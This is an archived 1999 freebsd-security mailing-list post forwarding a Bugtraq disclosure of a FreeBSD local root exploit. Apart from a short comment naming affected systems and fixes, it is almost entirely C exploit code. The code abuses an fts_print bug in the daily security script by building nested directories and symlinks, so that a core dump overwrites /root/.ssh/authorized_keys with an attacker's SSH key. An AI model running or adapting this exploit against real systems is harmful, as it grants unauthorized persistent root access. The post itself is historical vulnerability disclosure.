Date: Thu, 26 Aug 1999 12:45:37 -0400 From: Forrest Aldrich <forrie@forrie.com> To: freebsd-security@freebsd.org Subject: Fwd: FreeBSD (and other BSDs?) local root explot Message-ID: <4.2.0.58.19990826124527.00aa85b0@216.67.12.69>
next in thread | raw e-mail | index | archive | help
>Approved-By: aleph1@SECURITYFOCUS.COM >Delivered-To: bugtraq@securityfocus.com >X-Mailer: XFMail 1.3 [p0] on Linux >X-SMS: +48601383657@text.plusgsm.pl >X-PGP: PGP key on WWW or finger >X-Operating-System: FreeBSD 3.2-STABLE (i386) >Date: Tue, 24 Aug 1999 23:47:05 +0200 >Reply-To: Przemyslaw Frasunek <secure@FREEBSD.LUBLIN.PL> >Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM> >From: Przemyslaw Frasunek <secure@FREEBSD.LUBLIN.PL> >Organization: Lubelska Grupa Uzytkownikow BSD >Subject: FreeBSD (and other BSDs?) local root explot >X-To: bugtraq@securityfocus.com >To: BUGTRAQ@SECURITYFOCUS.COM > >-----BEGIN PGP SIGNED MESSAGE----- >Hash: SHA1 > >/* > > (c) 1999 babcia padlina ltd. <babunia@FreeBSD.lublin.pl> > > bug in fts_print function allows to overwrite any file in system, when > running /etc/security script (executed from 'daily' scripts). > > affected systems: > - freebsd (all versions) > - probably openbsd/netbsd > > fix: > - limit root's coredump size > - patch libc > >*/ > >#include <stdio.h> >#include <errno.h> >#include <sys/stat.h> >#include <strings.h> >#include <unistd.h> > >#define STRING "\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n" >#define FILE "/root/.ssh/authorized_keys" >#define CORE "find.core" >#define DEPTH 300 >#define BUFSIZE 250 > >int makedir(dir, linkfrom, linkto) >char *dir, *linkfrom, *linkto; >{ > > if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO))) > return -1; > > if (chdir(dir)) > return -1; > > if (symlink(linkfrom, linkto) < 0) > return -1; > > return 0; >} > > >int main(argc, argv) >int argc; >char **argv; >{ > int i = 0; > char pid[10], buf[BUFSIZE]; > > sprintf(pid, "%d", getpid()); > > if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO))) > { > perror("mkdir()"); > return -1; > } > > if (chdir(pid)) > { > perror("chdir()"); > return -1; > } > > bzero(buf, BUFSIZE); > memset(buf, 0x41, BUFSIZE-1); > > for(i=0;i<DEPTH;i++) > { > if (makedir(STRING, FILE, CORE) < 0) > { > perror("makedir()"); > return -1; > } > > if(makedir(buf, FILE, CORE) < 0) > { > perror("makedir()"); > return -1; > } > } > > return 0; >} > >- --- >* Fido: 2:480/124 ** WWW: FreeBSD.lublin.pl/~venglin ** GSM: +48-601-383657 * >* Inet: venglin@FreeBSD.lublin.pl ** PGP: D48684904685DF43 EA93AFA13BE170BF * > >-----BEGIN PGP SIGNATURE----- >Version: PGPfreeware 5.0i for non-commercial use >Charset: noconv > >iQA/AwUBN8MS2P6SPyHAYTvjEQLK5ACfZ1cVpjGzqIF3bTsIX/wrahJOqy4AoOEx >JkgnTo+Dk3QUFGT2bZdmxx9S >=Tyvh >-----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?4.2.0.58.19990826124527.00aa85b0>